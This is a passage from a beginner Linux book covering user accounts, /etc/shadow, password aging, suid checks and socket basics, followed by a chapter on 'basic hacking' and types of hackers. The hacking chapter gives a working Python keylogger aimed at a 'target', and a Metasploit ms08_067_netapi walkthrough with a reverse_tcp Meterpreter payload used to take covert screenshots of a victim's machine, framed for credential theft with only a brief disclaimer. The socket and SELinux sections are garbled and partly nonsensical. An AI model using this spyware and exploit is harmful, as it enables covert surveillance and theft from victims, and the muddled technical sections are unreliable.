[student@desktop ~]$ sudo usermod -aG wheel student
Using the -a option ensures that the modification to the user is done in
append mode. Without it, the user will be removed from all other
supplementary groups and added only to the new group.
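You can inspect group membership without root using id. The primary group (id -gn) always appears in the full group list printed by id -nG, so a quick sanity check looks like this:

```shell
# Primary group of the current user
primary=$(id -gn)

# All groups, primary and supplementary, one per line
id -nG | tr ' ' '\n'

# The primary group is always included in the full list
id -nG | tr ' ' '\n' | grep -qx "$primary" && echo "primary group listed"
```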
User Password Management
In this section, we will learn about the shadow password file and how you
can use it to manually lock accounts or set password-aging policies to an
account. In the initial days of Linux development, the encrypted password for
a user was stored in the file /etc/passwd, which is world-readable. This was
considered secure until attackers started using dictionary attacks on the
encrypted passwords. It was then decided to move the encrypted password
hashes to a more secure location, the /etc/shadow file. The current
implementation also allows you to set password-aging policies and expiration
features using this new file.
The modern password hash has three pieces of information in it. Consider the
following password hash:
$1$gCLa2/Z$6Pu0EKAzfCjxjv2hoLOB/
1: This part specifies the hashing algorithm used. The number 1 indicates
that an MD5 hash has been implemented. The number 6 comes into the
hash when a SHA-512 hash is used.
gCLa2/Z: This indicates the salt used to encrypt the hash. It is a randomly
chosen salt at first. The combination of the unencrypted password and salt
together form the encrypted hash. The advantage of having a salt is that
two users who may be using the same password will not have identical
hash entries in the /etc/shadow file.
6Pu0EKAzfCjxjv2hoLOB/: This is the encrypted hash.
In the event of a user trying to log in to the system, the system looks up
their entry in the /etc/shadow file. It then combines the unencrypted
password entered by the user with the stored salt for that user and encrypts
the combination using the specified hash algorithm. If the result matches
the hash in the /etc/shadow file, the user typed the correct password;
otherwise, the login attempt fails. This method is secure because it allows
the system to determine whether a user typed the correct password without
having to store the actual unencrypted password in the file system.
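You can reproduce this salted-hash behavior with the openssl command (assuming it is installed; the password and salt below are made up). Hashing the same password with the same salt always yields the same string, which is exactly the comparison the login process performs:

```shell
# MD5-crypt ($1$) hash of a made-up password with a fixed salt
h1=$(openssl passwd -1 -salt gCLa2/Z mypassword)
h2=$(openssl passwd -1 -salt gCLa2/Z mypassword)

# Same password + same salt → identical hash, so the system never
# needs to store the cleartext password
[ "$h1" = "$h2" ] && echo "hashes match"

# A different salt gives a different hash for the same password,
# so two users with the same password get different entries
openssl passwd -1 -salt abcdefgh mypassword
```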
The format of the /etc/shadow file is as below. There are 9 fields for every
user, as follows:
name:password:lastchange:minage:maxage:warning:inactive:expire:blank
name: This needs to be a valid username on a particular system through
which a user logs in.
password: This is where the encrypted password of the user is stored. If the
field starts with an exclamation mark, it means that password is locked.
lastchange: This is the timestamp of the last password change done for the
account.
minage: This defines the minimum number of days before a password needs
to be changed. If it is the number 0, it means there is no minimum age for the
account.
maxage: This defines the maximum number of days before a password needs
to be changed.
warning: This is a warning period that shows that the password is going to
expire. If the number is 0, it means that no warning will be given before
password expiry.
inactive: This is the number of days after password expiry during which the
account stays active. During this period, the user can still log in with the
expired password in order to change it. If the user fails to do so within
the specified number of days, the account gets locked and becomes inactive.
expire: This is the date when the account is set to expire.
blank: This is a blank field, which is reserved for future use.
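As with /etc/passwd, the aging fields can be extracted with awk. A sketch using a fabricated shadow-style entry (the hash here is a placeholder, not a real one):

```shell
# A sample /etc/shadow-style entry (fabricated; real hashes are longer)
entry='alice:$6$salt$hash:18000:0:90:7:14::'

# Fields: 3=lastchange 4=minage 5=maxage 6=warning 7=inactive
echo "$entry" | awk -F: '{print "maxage:", $5, "warning:", $6}'
# → maxage: 90 warning: 7
```

Reading the real /etc/shadow requires root, which is the whole point of moving the hashes there.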
Password Aging
Password aging is a technique employed by system administrators to safeguard
against weak passwords set by users of an organization. The policy basically
sets a number of days, 90 by default, after which a user is forced to change
their password. The advantage of forcing a password change is that even if
someone has gained access to a user’s password, they will have it only for a
limited amount of time. The downside of this approach is that users tend to
write their password down somewhere, since they cannot memorize it if it
keeps changing.
In Red Hat Enterprise Linux 7, there are two ways through which password
aging can be enforced.

1. Using the chage command on the command line
2. Using the User Management application in the graphical interface
The chage command with the -M option lets a system admin specify the
number of days for which a password is valid. Let us look at an example.
[student@desktop ~]$ sudo chage -M 90 alice
In this command, the password validity for the user alice is set to 90
days, after which the user will be forced to reset their password. If you
want to effectively disable password aging, you can set the -M value to
9999, which is equivalent to roughly 27 years.
You can set password aging policies by using the graphical user interface
as well. There is an application called User Manager, which you can
access from the Main Menu Button > System Settings > Users & Groups.
Alternatively, you can type the command system-config-users in the
terminal window. The User Manager window will pop up. Navigate to the
Users tab, select the required user from the list, and click on the Properties
button where you can set the password aging policy.
Access Restriction
You can set the expiry for an account using the chage command. The user
will not be allowed to login to the system once that date is reached. You
can use the usermod command with the -L option to lock a particular user
account.
[student@desktop ~]$ sudo usermod -L alice
[student@desktop ~]$ su - alice
Password: alice
su: Authentication failure
The usermod command is useful to lock and expire an account at the same
time in a case where the employee might have left the company.
[student@desktop ~]$ sudo usermod -L -e 1 alice
A user cannot authenticate into the system using a password once their
account has been locked. Locking is one of the best practices for
preventing authentication by an employee who has already left the
organization. You can use the usermod -U username command later to unlock
the account, in the event that the employee rejoins the organization. While
doing this, if the account was in an expired state, you will also need to
set a new expiry date for the account.
The nologin shell
There will be instances where you want to create a user who can authenticate
using a password and get a login into the system but would not need a shell to
interact with the system. For example, a mail server may require a user to
have an email account so that the user can log in and check their emails,
but the user does not need an interactive shell on the system to do so.
This is where the nologin shell comes in as a solution. We simply set the
shell for this user to /sbin/nologin. Once this is done, the user cannot
log in to the system using the direct login procedure.

[root@desktop ~]# usermod -s /sbin/nologin student
[root@desktop ~]# su - student
Last login: Tue Mar 5 20:40:34 GMT 2015 on pts/0
The account is currently not available.
By using the nologin shell for the user, you are denying the user interactive
login into the system but not all access to the system. The user will still be
able to use certain web applications for file transfer applications to upload or
download files.
Chapter 11 Learning Linux Security Techniques
To help you gain better security and keep your OS in a “healthy” state,
it’s best that you take note of the techniques covered below:
Cross Platforms
You can also do cross-platform socket programming from Linux. When porting
to Windows, keep the following in mind:
windows.h and winsock.h should be used as the header files.
Instead of close(), closesocket() has to be used.
send() and recv() are used instead of read() or write().
WSAStartup() is used to initialize the library.
Internet Message Protocol
Host Resolutions
One thing you have to keep in mind here is to use gethostname() so that the
standard library makes the right call. This comes up when you are trying to
find the name of the host a program is running on, and when you want to use
that name in larger applications.
Linux Sockets
What you have to understand about Linux is that its networking follows the
Open Systems Interconnection (OSI) and Internet models, and you work with
it through sockets. To establish connections, you create a listening socket
so that hosts can connect. Calling listen() allows the program to accept()
incoming connections, and bind() attaches the socket to an address. The
typical call sequences look like this:
Server: socket() → bind() → listen() → accept() → read() → write() → read()
Client: socket() → connect() → write() → read() → close()
Send request: write() → read()
Receive reply: write() → read()
Establish connection: connect() → accept()
Close connection: close() → read()
Understanding basic Linux security
Construct and Destruct
These are connected to the descriptor of the socket that allow peer TCP Ports
and peer IP Addresses to show up onscreen. Take note that this does not use
other languages, except for C++, unlike its contemporaries in Linux.
Destructors are then able to close any connections that you have made. For
example, if you want to log out of one of your social networking accounts,
you’re able to do it because destructors are around.
Linux and SMTP Clients
As for SMTP Client, you could expect that it involves some of the same
characters above—with just a few adjustments. You also should keep in mind
that this is all about opening the socket, opening input and output streams,
reading and writing the socket, and lastly, cleaning the client portal up. You
also have to know that it involves the following:
Datagram Communication. This means that local sockets would work
every time your portal sends datagrams to various clients and servers.
Linux Communications. This time, stream and datagram
communication are involved.
Programming Sockets. And of course, you can expect you’ll program
sockets in the right manner!
Echo Client Set-ups
In Linux, Echo Clients work by means of inserting arguments inside the
socket() because it means that you will be able to use the IP together with
the PF_INET function so that they could both go in the TCP socket. To set
up a proper client structure, just remember you have to make a couple of
adjustments from earlier codes.
Linux and its Sockets
You also have to understand that you can code for Linux in C mainly because
both involve the use of sockets. The socket works like a bridge that binds
the client to the port, and it is also responsible for sending the right
kinds of requests to the server while waiting for it to respond. Finally,
the sending and receiving of data takes place.
At the same time, the Linux Socket is also able to create a socket for the
server that would then bind itself to the port. During that stage, you can begin
listening to client traffic as it builds up. You could also wait for the client at
that point, and finally, see the sending and receiving of data to happen. Its
other functions are the following:
socket_description. This allows the description of both the client and the
server to show up onscreen.
write buffer. This describes the data that needs to be sent.
write buffer length. The length of the buffer to write, taken from the
string’s output.
client_socket. The socket description will also show on top.
address. This is used by the connect function so that address_len would
be on top.
address_len. If the second parameter is null, this would appear onscreen.
return. This returns the description of both the client and the socket,
which makes interaction between the client and the server easy.
server_socket. This is the description of the socket that’s located on top.
backlog. This is the number of requests that have not yet been dealt with.
You could also put personal comments every once in a while—but definitely
not all the time!
Understanding advanced Linux security
Internet Protocol is all about providing boundaries in the network, as well as
relaying datagrams that allow internet-networking to happen.
The construction involves a header and a payload where the header is
known to be the main IP Address, and with interfaces that are connected
with the help of certain parameters. Routing prefixes and network
designation are also involved, together with internal or external gateway
protocols, too. Reliability also depends on end-to-end protocols, but
mostly, you could expect the framework to be this way:
Data → Application
UDP Header | UDP Data → Transport
IP Header | IP Data → Internet
Frame Header | Frame Data | Frame Footer → Link
Getting Peer Information
In order to get peer information, you have to make sure that you return
both TCP and IP information. This way, you could be sure that both server
and client are connected to the network. You could also use the
getpeername() socket so that when information is available, it could
easily be captured and saved. This provides the right data to be sent and
received by various methods involved in Linux, and also contains proper
socket descriptors and grants privileges to others in the program. Some
may even be deemed private, to make the experience better for the users.
To accept information, let the socket TCPAcceptor::accept() be
prevalent in the network. This way, you could differentiate actions coming
from the server and the client.
All Linux distros come with a robust selection of applications that you can
use for almost all of your daily computing needs. Almost all of these
applications are easily accessible using your distro’s GUI desktop.
In this chapter, you will get to know some of the most common Linux
applications and learn how to access them whenever you want to. You will
also get to know some of the file managers used by different GUIs, which
will allow you to make changes or browse files in your computer.
Almost all applications used by Linux have dedicated websites in which you
can find detailed information about them, including details on where and how
to download them. At the same time, all distros come with different sets of
utilities and apps that you can choose to install as you setup your chosen
distro.
If you have a missing app in a Debian or Debian-based distro, such as
Ubuntu, you can easily get that application as long as you have a high-speed
internet connection.
Enhancing Linux security with SELinux
Technically speaking, Linux itself is not an operating system; the distros
that are based on the Linux kernel are. Linux is supported by the larger
Free/Libre/Open Source Software community, a.k.a. FLOSS. This community is
also essential for Security-Enhanced Linux (SELinux), which integrates
mandatory access control policies into the kernel. The code base has grown
exponentially in length since its development.
Before you get started with programming on Linux, you need to have a clear
idea of what your goals are. If your goal is to make money, you can create
apps that are sold for a fee. If your goal is to contribute to the community,
you need to figure out what particular niche you can help fill. If you are
running a large business, you may want to hire a small army of tech
personnel to create patches and applications that will help to better run your
business’s software. A goal is not something that a book can give you; it is
something that you have to come up with yourself. What the rest of this book
will give you is some of the basic know-how that you will need to get started
with making those goals regarding Linux attainable.
There is a permission setting that can be seen as threatening to security,
which is called setuid or suid (set user ID). This permission setting applies to
files that you can run, or executable files. When the setuid/suid permission is
allowed, a file is executed under the owner’s user ID. In short, if the suid
permission is on and the file is owned by the root user, the targeted program
will view the root user to be the one running the file and not check on who
ran the program in reality. This means that a suid program can perform more
functions than the owner intends ordinary users to perform. Note also that if
a program with the suid permission has security vulnerabilities, malicious
hackers can exploit it to cause far more havoc.
To find all enabled suid permissions, you can use the find command like
this (the exact options can vary; this form works on most Linux systems):
find / -type f -perm -4000 -ls 2>/dev/null
The -perm -4000 test matches files with the suid bit set, and the redirection
hides the “permission denied” errors from directories you cannot read.
After entering this command, you will see a list of files that appears like this
example (the exact files, sizes, and dates will differ from system to system):
-rwsr-xr-x 1 root root 63960 /usr/bin/passwd
-rwsr-xr-x 1 root root 44664 /bin/su
Take note that there are numerous programs that are set with a suid
permission because they require it. However, you may want to check the
entire list to make sure that there are no programs that have odd suid
permissions. For example, you may not want to have suid programs located
in your home directory.
Here is an example: typing ls -l /bin/su will give you a result similar to the
following (the size and date will vary by system):
-rwsr-xr-x 1 root root 44664 /bin/su
The character s in the owner's permission bits (shown as -rws) indicates that
the file /bin/su has the suid permission. This is what allows the su command,
which grants any user superuser privileges, to be used by anyone.
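As a quick sanity check, you can also test for the suid bit from Python. This
is a small sketch of my own, not a standard admin tool; it uses only the
standard library os and stat modules.

```python
import os
import stat

def has_suid(path):
    """Return True if the file at `path` has the setuid bit enabled."""
    mode = os.stat(path).st_mode
    return bool(mode & stat.S_ISUID)

# Example: /bin/su is normally a suid root binary on Linux systems.
# print(has_suid("/bin/su"))
```

This checks a single file; the find command above remains the practical way
to sweep the whole filesystem.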
Chapter 12 Some Basic Hacking with Linux
Now that you have hopefully gotten used to the Linux system and have some
ideas of how it works and such, it is a good time to learn a little bit about
hacking with Linux. Whether you are using this system on your own or you
have it set up with a network of other people, there are a few types of hacking
that you may find useful to know how to do. This chapter is going to spend
some time exploring some basic hacking endeavors on the Linux system.
We want to spend some time looking at how we can work with the Linux
system to help us complete some of the ethical hacking that we would like to
do. While we are able to do some hacking with the help of Windows and
Mac, often, the best operating system to help us out with all of this is going to
be the Linux operating system. It already works on the command line, which
makes things a bit easier and will have all of the protection that you need as
well. And so, we are going to spend a bit of our time taking a closer look at
how the Linux system is going to be able to help us out with some of the
hacking we want to accomplish.
There are a lot of reasons that hackers are going to enjoy working with Linux
over some of the other operating systems that are out there. The first benefit
is that it is open source. This means that the source code is right there and
available for you to use and modify without having to pay a lot of fees or
worry that it is going to get you into trouble. This open-source nature also
allows you to gain more access to it, share it with others, and much more.
All of this can be beneficial to someone who is ready to get started with
hacking as well.
The compatibility that comes with Linux is going to be beneficial for a
hacker as well. This operating system is going to be unique in that it is going
to help us support all of the software packages of Unix and it is also able to
support all of the common file formats that are with it as well. This is
important when it comes to helping us to work with some of the hacking
codes that we want to do later on.
Linux is also designed to be fast and easy to install. There are a number of
steps that we had to go through in order to get started. But when compared to
some of the other operating systems this is not going to be that many and it
can really help you to get the most out of this in as little time as possible.
You will quickly notice that most of the distributions of Linux that you are
able to use have installations that are meant to be easy on the
user.
with tools that will make installing any of the additional software that you
want as easy and friendly as possible too. Another thing that you might notice
with this is that the boot time of the operating system of Linux is going to be
faster than what we see with options like Mac and Windows, which can be
nice if you do not want to wait around all of the time.
When you are working on some of the hacks that you would like to
accomplish, the stability of the program is going to matter quite a bit. You do
not want to work with a system that is not all that stable, or that is going to
fall apart on you in no time. Linux is not going to have to go through the
same periodic reboots like others in order to maintain the level of
performance that you would like and it is not going to slow down or freeze up
over time if there are issues with leaks in the memory and more. You are also
able to use this operating system for a long time to come, without having to
worry about it slowing down or running into some of the other issues that the
traditional operating systems will need to worry about.
For someone who is going to spend their time working with ethical hacking,
this is going to be really important as well. It will ensure that you are able to
work with an operating system that is not going to slow down and cause
issues with the protections that you put in place on it. And you will not have
to worry about all of the issues that can come up with it being vulnerable and
causing issues down the line as well. It is going to be safe and secure along
the way, so that you are able to complete your hacks and keep things safe,
without having to worry about things not always working out the way that we
would hope.
Another benefit worth a bit of time is how network-friendly Linux is overall.
Because this operating system is open source and developed by contributors
collaborating over the internet, it handles networking tasks effectively. It
offers easy-to-learn networking commands and plenty of libraries that can be
used in a network penetration test if you choose to run one. Add to that the
fact that Linux makes network backups faster and more reliable, and you can
see why so many users love to work with this option.
As a hacker, you will need to spend some of your time multitasking to get all
of the work done. Much of the code you run during a hack needs more than
one thing going at a time, and Linux can handle all of this without the
computer bogging down or freezing up on you.
In fact, the Linux system was designed in order to do a lot of things at the
same time. This means that if you are doing something large, like finishing
up a big printing job in the background, it is not really going to slow down
some of the other work that you are doing. Plus, when you need to handle
more than one process at the same time, it is going to be easier to do on
Linux, compared to Mac or Windows, which can be a dream for a hacker.
You may also notice that working with the Linux system is a bit different and
some of the interactions that you have to take care of are not going to be the
same as what we found in the other options. For example, the command-line
interface is going to introduce us to something new. Linux operating systems
are going to be specifically designed around a strong and highly integrated
command-line interface, something that the other two operating systems are
not going to have. The reason that this is important is that it will allow
hackers and other users of Linux to have more access and even more control,
over their system.
Next on the list is the fact that the Linux system is lighter and more portable
than some of the other operating systems out there. This is a great thing
because it gives hackers an easy way to customize live boot disks and drives
from any distribution of Linux that they would like. Installation is fast and
does not consume many resources in the process. Linux is lightweight and
easy to use while consuming fewer resources overall.
The maintenance is going to be another important feature that we need to
look at when we are trying to do some ethical hacking and work with a good
operating system. Maintaining the Linux operating system is going to be easy
to work with. All of the software is installed in an easy manner that does not
take all that long and every variant of Linux has its own central software
repository, which makes it easier for the users to search for their software and
use the kind that they would like along the way.
There is also a lot of flexibility when it comes to working with this kind of
operating system. As a hacker, you are going to need to handle a lot of
different tools along the way. And one of the best ways that we are able to do
this is to work with an operating system that allows for some flexibility in the
work that we are doing. This is actually one of the most important features in
Linux because it allows us to work with embedded systems, desktop
applications and high-performance server applications as well.
As a hacker, you want to make sure that your costs are as low as possible. No
one wants to get into the world of ethical hacking and start messing with
some of those codes and processes and then find out that they have to spend
hundreds of dollars in order to get it all done. And this is where the Linux
system is going to come into play. As you can see from some of our earlier
discussions of this operating system, it is going to be an open-source
operating system, which means that we are able to download it free of cost.
This allows us to get started with some of the hacking that we want to do
without having to worry about the costs.
If you are working with ethical hacking, then your main goal is to make sure
that your computer and all of the personal information you put into it stays
safe and secure at all times. Keeping other hackers out means you don't have
to worry about your finances or other sensitive data along the way, either.
And this is another place where the Linux operating system comes into play
to help us out.
One of the nice things that we are going to notice when it comes to the Linux
operating system is that it is seen as being less vulnerable than some of the
other options. Today, most of the operating systems that we are able to
choose from, besides the Linux option, are going to have a lot of
vulnerabilities to an attack from someone with malicious intent along the
way.
Linux, on the other hand, seems to have fewer of these vulnerabilities in
place from the beginning. This makes it a lot nicer to work with and helps
ensure that we can do the work we want on it without a hacker getting in.
Linux is seen as one of the most secure of all the operating systems
available, and this is good news when you are starting out as an ethical
hacker.
The next benefit that we are going to see when it comes to working with the
Linux operating system over some of the other options, especially if you are a
hacker, is that it is going to provide us with a lot of support and works with
most of the programming languages that you would choose to work on when
coding. Linux is already set up to work with many of the most popular
programming languages. This means that options like Perl, Ruby, Python,
PHP, C++, and Java are going to work great here.
This is good news for the hacker because it allows them to pick out the option
that they like. If you already know a coding language or there is one in
particular that you would like to use for some of the hacking that you plan to
do, then it is likely that the Linux system is going to be able to handle this
and will make it easy to use that one as well.
If you want to spend some of your time working on hacking, then the Linux
system is a good option. And this includes the fact that many of the hacking
tools that we are working with are going to be written out in Linux. Popular
hacking tools like Nmap and Metasploit, along with a few other options, are
going to be ported for Windows. However, you will find that while they can
work with Windows, if you want, you will miss out on some of the
capabilities when you transfer them off of Linux.
It is often better to leave these hacking tools on Linux. This allows you to get
the full use of all of them and all of the good capabilities that you can find
with them, without having to worry about what does and does not work if you
try to move them over to a second operating system. These hacking tools
were made and designed to work well in Linux, so keeping them there and
not trying to force them into another operating system allows you to get the
most out of your hacking needs.
And finally, we are able to take a quick look at how the Linux operating
system is going to take privacy as seriously as possible. In the past few years,
there was a lot of information on the news about the privacy issues that
would show up with the Windows 10 operating system. Windows 10 is set up
to collect a lot of data on the people who use it the most. This could bring up
some concerns about how safe your personal information could be.
This is not a problem when we are working with Linux. This system is not
going to take information, you will not find any talking assistants to help you
out and this operating system is not going to be around, collecting
information and data on you to have some financial gain. This all can speak
volumes to an ethical hacker who wants to make sure that their information
stay safe and secure all of the time.
As you can see here, there are a lot of benefits that are going to show up
when it is time to work with the Linux system. We can find a lot of examples
of this operating system and all of the amazing things that it is able to do,
even if we don’t personally use it on our desktop or laptop. The good news is
that there are a lot of features that are likely to make this operating system
more effective and strong in the future, which is perfect when it comes to
doing a lot of tasks, including the hacking techniques that we talked about.
Making a key logger
The first thing we are going to learn how to work with is a key logger. This
can be an interesting tool because it allows you to see what keystrokes
someone is making on your computer right from the beginning. Whether you
have a network that you need to keep safe and you want to see what others
on the system are typing out, or if you are using a type of black hat hacking
and are trying to get the information for your own personal use, the key
logger is one of the tools that you can use to make this work out easily for
you.
Now there are going to be a few different parts that you will need to add in
here. You can download a key logger library online (many of the beginner-
friendly ones for Linux are hosted in Git repositories), and while this will
capture every character someone types on a particular computer system, on
its own it is not very helpful. Basically, you will get each letter on a separate
line with no time stamps or anything else to help you out.
It is much better to work this out so that you are getting all the information
that you need, such as lines of text rather than each letter on a different line
and a time stamp to tell you when each one was performed. You can train the
system to only stop at certain times, such as when there is a break that is
longer than two seconds, and it will type in all the information that happens
with the keystrokes at once rather than splitting it up. A time stamp is going
to make it easier to see when things are happening and you will soon be able
to see patterns, as well as more legible words and phrases.
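The grouping idea described above can be sketched in Python. This is a
hypothetical helper of my own (it is not part of pyxhook): it joins keys that
arrive within two seconds of each other into one line of text and records the
timestamp of the first key in each group.

```python
import time

class KeystrokeBuffer:
    """Group single key presses into lines of text with a timestamp.

    Keys arriving within `gap` seconds of the previous key are joined
    into one string; a longer pause flushes the current group together
    with the time of its first key.
    """

    def __init__(self, gap=2.0, clock=time.monotonic):
        self.gap = gap
        self.clock = clock          # injectable clock, handy for testing
        self.keys = []
        self.start = None           # timestamp of the group's first key
        self.last = None            # timestamp of the most recent key
        self.flushed = []           # list of (timestamp, text) pairs

    def press(self, key):
        now = self.clock()
        if self.last is not None and now - self.last > self.gap:
            self.flush()            # pause was too long: close the group
        if not self.keys:
            self.start = now
        self.keys.append(key)
        self.last = now

    def flush(self):
        if self.keys:
            self.flushed.append((self.start, "".join(self.keys)))
            self.keys = []
```

In a real key logger you would call press() from the key-press callback and
write each flushed (timestamp, text) pair to the log file instead of one letter
per line.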
When you are ready to bring all of these pieces together, here is the Python
code (using the pyxhook library) that you can save as a script and run on
Linux in order to get the key logger all set up:
import pyxhook
# change this to your log file's path
log_file = '/home/aman/Desktop/file.log'
# this function is called every time a key is pressed
def OnKeyPress(event):
    fob = open(log_file, 'a')
    fob.write(event.Key)
    fob.write('\n')
    fob.close()
    if event.Ascii == 96: # 96 is the ASCII value of the grave key (`)
        new_hook.cancel()
# instantiate HookManager class
new_hook = pyxhook.HookManager()
# listen to all keystrokes
new_hook.KeyDown = OnKeyPress
# hook the keyboard
new_hook.HookKeyboard()
# start the session
new_hook.start()
Now you should be able to get a lot of the information that you need in order
to keep track of all the key strokes that are going on with the target computer.
You will be able to see the words come out in a steady stream that is easier to
read, you will get some time stamps, and it shouldn’t be too hard to figure out
where the target is visiting and what information they are putting in. Of
course, this is often better when it is paired with a few other options, such as
taking screenshots and tracking where the mouse of the target computer is
going in case they click on links or don’t type in the address of the site they
are visiting, and we will explore that more now!
Getting screenshots
Now, you can get a lot of information from the key strokes, but often these
are just going to end up being random words with time stamps accompanying
them. Even if you are able to see the username and password that you want, if
the target is using a link in order to get their information or to navigate to a
website, how are you supposed to know where they are typing the
information you have recorded?
While there are a few codes that you can use in order to get more information
about what the target is doing, getting screenshots is one of the best ways to
do so. This helps you to not only get a hold of the username and passwords
based on the screenshots that are coming up, but you are also able to see what
the target is doing on the screen, making the hack much more effective for
you.
Don’t worry about this sounding too complicated. The code that you need to
make this happen is not too difficult and as long as you are used to the
command prompt, you will find that it is pretty easy to get the screenshots
that you want. The steps that you need to take in order to get the screenshots
include:
Step 1: Set the hack up
First, you will need to select the kind of exploit that you need to use. A good
exploit that you should consider using is the MS08_067_netapi exploit. You
will need to get this one onto the system by typing:
msf > use exploit/windows/smb/ms08_067_netapi
Once this is on the system, it is time to add a payload that simplifies the
screen captures. Metasploit's Meterpreter payload makes this easy to do. In
order to set it up and load it into your exploit, you will need to type in the
following code:
msf> (ms08_067_netapi) set payload windows/meterpreter/reverse_tcp
The following step is to set up the options that you want to use. A good place
to start is with the show options command. This command is going to let you
see the options that are available and necessary if you would like to run the
hack. To get the show options command to work well on your computer, you
will need to type in the following code:
msf > (ms08_067_netapi) show options
At this point, you should be able to see the IP addresses of the victim (the
RHOST) and of the attacker, which is you (the LHOST). These are important
to know when you want to take over another computer because its IP address
is what lets you reach it. The two commands you need in order to set the
target's IP address and your own so that you can take over the target's
system are:
msf > (ms08_067_netapi) set RHOST 192.168.1.108
msf > (ms08_067_netapi) set LHOST 192.168.1.109
Now if you have gone through and done the process correctly, you should be
able to exploit into the other computer and put the Meterpreter onto it. The
target computer is going to be under your control now and you will be able to
take the screenshots that you want with the following steps.
Step 2: Getting the screenshots
With this step, we are going to work on getting the screenshots that you want.
But before we do that, we want to find out the process ID, or the PID, that
you are using. To do this, you will need to type in the code:
meterpreter > getpid
The screen that comes up next is going to show you the PID that you are
using on the target's computer. For this example we are going to use a PID
of 932, but it will vary based on the target's computer.
Now that you have this number, you will be able to check which process this
is by getting a list of all the processes with the corresponding PIDs. To do
this, you will just need to type in:
meterpreter > ps
When you look at the PID 932, or the one that corresponds to your target's
particular system, you will see that it corresponds to the process known as
svchost.exe. Since you are using a process that has active desktop
permissions in this case, you will be ready to go. If you don't have the right
permissions, you may need to migrate to another process in order to get the
active desktop permissions.
need to activate the built in script inside of Meterpreter. The script that you
need is going to be known as espia. To do this, you will simply need to type
out:
meterpreter > use espia
Running this script is just going to install the espia app onto the computer of
your target. Now you will be able to get the screenshots that you want. To get
a single screenshot of the target computer, you will simply need to type in the
code:
meterpreter > screengrab
When you type out this code, the espia script basically takes a screenshot of
what the target's computer is doing at that moment, and then saves it to the
root user's directory. You will then see a copy of it come up on your own
computer. You can take a look at what is going on, and if you did this in the
proper way, the target computer will not detect that you took the screenshots
or that you are there at all. You can keep track of what is going on and take
as many different screenshots as you would like.
These screenshots are pretty easy to set up and they are going to make it
easier than ever to get the information that you need as a hacker. You will not
only receive information about where the user is heading to, but also what
information they are typing into the computer.
Keep in mind that black hat hacking is usually illegal and it is not encouraged
in any way. While the black hat hackers would use the formulas above in
order to get information, it is best to stay away from using these tactics in an
illegal manner. Learning these skills however can be a great way to protect
yourself against potential threats of black hat hackers. Also, having hacking
skills allows you to detect security threats in the systems of other people.
Being a professional hacker can be a highly lucrative career, as big
companies pay a lot of money to ensure that their systems are secure. Hack-
testing systems for them is a challenging and fun way to make a living for
the skilled hackers out there!
Chapter 13 Types of Hackers
All lines of work in society today have different forms. You are either blue
collar, white collar, no collar…whatever. Hacking is no different. Just as
there are different kinds of jobs associated with different collar colors, the
same goes for hacking.
Hackers have been classified into many different categories, black hat, white
hat, grey hat, newbies, hacktivists, elites, and more. Now, to help you gain a
better understanding as to what grey hacking is, let’s first take a look at these
other kinds of hacking, so you can get a feel for what it is hackers do, or can
do, when they are online.
Newbies
The best place to start anything is at the beginning, which is why we are
starting with the newbie hackers.
The problem with a lot of newbie hackers is that they think they have it all
figured out when they really don’t. The idea of hacking is really only
scratching the surface when it comes to everything that is involved, and it is
not at all uncommon for people who want to get into it to get overwhelmed
when they see what really needs to be learned.
Don’t let that discourage you, however, you are able to learn it all, it just
takes time and effort on your part. Borrow books and get online. Look up
what needs to be and remember it. Don’t rush yourself. You need to learn,
and really learn. Anything that you don’t remember can end up costing you
later.
There are immediate reactions when it comes to the real world of hacking,
and sitting there trying to look up what you should have already known is not
going to get you far as a hacker. If you want to be good at what you do, then
take the time required to be good at it.
Don’t waste your time if you don’t think you really want to learn it, because
it is going to take a lot of your concentration to get to the heart of the matter.
Don’t get me wrong, it is more than worth it, but if you are only looking into
it for curiosity sake, don’t do it unless knowing really means that much to
you.
Sure there are those that kind of know what they are doing, or they can get
into their friend’s email account, but that is not the hacking I am talking
about here.
I want you to become a real life, capable hacker, and that isn’t going to
happen unless you are willing to take the time needed to learn it, and put
forth the effort to learn it.
You have to remember that any hacker that is in existence had to start as a
newbie hacker, and build up their skills from there. Now, as fast they built
those skills depended greatly on how much time and effort they put into
working on it, but don’t worry, you will get the hang of things, and while you
have to start as a newbie, you will have Grey Hat status soon enough.
Elites
As with the newbie hackers, elite hackers can be any kind of hacker, whether
that be good or bad. What makes them elite is the fact they are good at what
they do, and they know it.
There is a lot of respect for elite hackers online. Just like with elite anything,
they know what they are doing, and they know that others can’t challenge
them unless they too know how to handle themselves.
There is a level of arrogance that goes with the status, but it is well deserved.
Anyone can stop at second best, but it takes true dedication to reach the top.
An elite hacker can use their powers for good or bad, but they are a force to
be reckoned with either way. They know the way systems work, how to work
around them, and how to get them to do what they want them to do.
If you have a goal of becoming an elite hacker, you do have your work cut
out for you, but don’t worry, you will get there. It only takes time and effort
to get this top dog status, and it comes to those who want it.
No one ‘accidentally’ achieves elite status; it is something that they had to
work for, but it is definitely worth all of the time and effort that is put into it.
As an elite hacker, you won’t have to worry about whatever system you run
into, you will know what is coming, and how you can work around it, it just
comes with the line of work.
Hacktivists
Hacktivist hackers use their skills to promote a social or political agenda.
Sometimes they are hired by specific groups to get into places online and
gather information, sometimes they work all on their own.
The point of this kind of hacking is to make one political party look bad, and
the one that the hacker promotes to look good.
Then, they either publish it elsewhere online, or they pass it along so others
can see what the person has done or what they are accused of doing. It is a
way for politicians to make jabs at each other, and it isn’t really playing the
game fairly.
The hacker then is either paid by the party that hired them or, if they are
working for themselves, they get to see the results of what they posted about
the politician.
The list of hackers and what they do is one that goes on and on, but they all
can ultimately fit into three categories, being the black hat, white hat, and
grey hats. No matter what kind of hacker they are on top of it, these are the
three realms that are really all encompassing.
This is because these are not only hackers in and of themselves, but they are
also characteristics of every kind of hacker out there. Whether they are doing
things for good, for bad, or doing good things without permission, these are
really what hacking comes down to.
Black hat
The black hat hacker is likely the most famous of the hacking world, or
rather, infamous. This is the line of hacking that movies tend to focus on, and
it is the line of hacking that has given all hacking a bad name.
A black hat hacker is a hacker that is getting into a system or network to
cause harm. They always have malicious intent, and they are there to hurt and
destroy. They do this by either stealing things, whether it be the person’s
information, the network’s codes, or anything else they find that is valuable
to them, or they can do it by planting worms and viruses into the system.
There have been viruses planted into various systems throughout history,
causing hundreds of thousands of dollars’ worth of damage, and putting
systems down for days.
Viruses are programs that hackers create, then distribute, that cause havoc on
whatever they can get a grip on. They often times disguise themselves to look
like one thing, and they prompt you to open them in whatever way they can.
Then, once you do open the link, they get into the hard drive of your system
and do whatever they want while they are in there. Many viruses behave like
